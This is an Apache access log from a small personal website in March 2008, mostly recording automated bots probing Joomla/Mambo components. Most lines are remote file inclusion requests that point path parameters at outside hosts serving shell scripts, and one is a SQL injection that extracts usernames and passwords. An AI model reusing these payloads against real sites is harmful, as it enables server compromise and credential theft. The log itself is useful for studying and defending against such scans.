88.191.48.162 - - [04/Mar/2008:08:56:00 -0800] "GET /logs/access_080221.log//index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.88 - - [04/Mar/2008:08:56:28 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:56:47 -0800] "GET /logs/access_080130.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:56:47 -0800] "GET //component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:56:47 -0800] "GET /logs//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:57:07 -0800] "GET /logs/access_080216.log//homepage.php?sel=http://tare12.nm.ru/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:57:13 -0800] "GET //homepage.php?sel=http://tare12.nm.ru/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:57:13 -0800] "GET /logs/access_080131.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:57:14 -0800] "GET /logs//homepage.php?sel=http://tare12.nm.ru/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.76.31.154 - - [04/Mar/2008:08:57:42 -0800] "GET /logs/index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.48.162 - - [04/Mar/2008:08:57:51 -0800] "GET /logs/access_080120.log//index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:08:58:02 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:59:29 -0800] "GET /logs/access_080130.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:59:30 -0800] "GET //component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:59:30 -0800] "GET /logs//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:08:59:34 -0800] "GET /logs/access_080122.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.82.172 - - [04/Mar/2008:08:59:54 -0800] "GET //include.php?path[docroot]=http://angel.yum.pl/joomla/images/borda10.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:09:00:20 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:09:00:21 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:09:00:21 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:09:00:31 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:09:00:31 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:09:00:55 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:09:00:56 -0800] "GET /logs/access_080122.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:09:01:36 -0800] "GET /logs/access_080131.log/index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:09:01:42 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:09:01:42 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:01:44 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:09:02:15 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:09:03:14 -0800] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:03:22 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:03:22 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.26.209 - - [04/Mar/2008:09:05:16 -0800] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:05:29 -0800] "GET /logs/access_080130.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:05:37 -0800] "GET //component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:05:38 -0800] "GET /logs//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:06:06 -0800] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:06:06 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:06:06 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:06:26 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:06:27 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:06:27 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:09:06:47 -0800] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:09:06:47 -0800] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:06:58 -0800] "GET /logs/access_080130.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:06:59 -0800] "GET //component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:06:59 -0800] "GET /logs//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:07:23 -0800] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:09:07:50 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:09:08:20 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.126.130 - - [04/Mar/2008:09:10:11 -0800] "GET /logs/access.log/index.php?option=com_user&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.126.130 - - [04/Mar/2008:09:10:11 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.126.130 - - [04/Mar/2008:09:10:12 -0800] "GET /logs/index.php?option=com_user&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:09:11:31 -0800] "GET /logs/access_080127.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:16 -0800] "GET /logs/access_080123.log//components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:16 -0800] "GET //components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:16 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET /logs/access_080123.log//components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET /logs/access_080123.log//components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET /logs/access_080123.log//components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET //components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET //components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET //components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:21 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:24 -0800] "GET /logs/access_080123.log//components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:24 -0800] "GET //components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:12:24 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.193.190 - - [04/Mar/2008:09:12:36 -0800] "GET /logs/access_080131.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.193.190 - - [04/Mar/2008:09:12:37 -0800] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.193.190 - - [04/Mar/2008:09:12:38 -0800] "GET /logs/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:09:12:48 -0800] "GET /logs/access_080123.log//components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:09:12:48 -0800] "GET //components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:09:12:48 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:09:12:58 -0800] "GET /rconfig.inc.php?config[root_dir]=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:09:13:16 -0800] "GET /logs/access_080207.log//components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:09:13:16 -0800] "GET //components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:09:13:16 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:09:13:31 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:09:13:31 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:14:33 -0800] "GET /logs/access_080122.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:14:46 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:14:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:15:42 -0800] "GET /logs/access_080215.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:09:16:04 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:09:16:05 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [04/Mar/2008:09:16:25 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:09:16:33 -0800] "GET /logs/access_080129.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:18:14 -0800] "GET /logs/access_080207.log//components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:18:14 -0800] "GET /logs/access_080207.log//components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:18:14 -0800] "GET /logs/access_080207.log//components/com_minibb.php?absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:18:14 -0800] "GET /logs/access_080207.log//components/com_minibb.php?absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:18:17 -0800] "GET /logs/access_080207.log//components/com_minibb.php?absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.91.224.9 - - [04/Mar/2008:09:18:20 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
77.91.224.9 - - [04/Mar/2008:09:18:21 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:09:18:51 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.135 - - [04/Mar/2008:09:18:56 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:19:03 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:19:03 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:19:04 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:19:20 -0800] "GET /logs/access_071230.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.166.61.155 - - [04/Mar/2008:09:19:20 -0800] "GET /logs/index.php?option=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.166.61.155 - - [04/Mar/2008:09:19:20 -0800] "GET /index.php?option=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.195.193.190 - - [04/Mar/2008:09:20:04 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:20:39 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:20:39 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:09:20:55 -0800] "GET /logs/access_080122.log//?x=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:09:20:56 -0800] "GET //?x=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:09:20:57 -0800] "GET /logs//?x=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 37265 "-" "libwww-perl/5.63" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:09:21:16 -0800] "GET /logs/access_080215.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:09:21:38 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:09:21:38 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:09:21:38 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
